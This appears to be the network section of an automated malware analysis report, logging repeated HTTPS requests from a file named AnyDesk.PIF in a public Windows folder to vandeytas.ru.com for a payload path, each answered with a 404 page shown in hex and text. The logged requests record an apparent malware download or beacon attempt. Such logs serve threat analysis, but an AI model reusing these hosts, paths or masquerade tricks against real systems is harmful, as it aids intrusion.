                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:02 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:02 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:02 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:02 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.44974850.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:04 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:05 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:04 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.44975250.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:06 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:07 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:06 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:07 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.44975550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:08 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:09 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.44975750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:10 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:11 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:11 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:11 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.44975950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:12 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:13 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:13 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:13 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.44976150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:15 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:15 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:15 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.44976350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:17 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:17 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:17 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.44976550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:19 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:20 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:19 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:20 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.44976750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:21 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:22 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:22 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:22 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.44976950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:23 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:24 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:24 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:24 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.44977150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:26 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:26 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:26 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.44977350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:28 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:28 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:28 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:28 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.44977550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:39:30 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:31 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:30 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
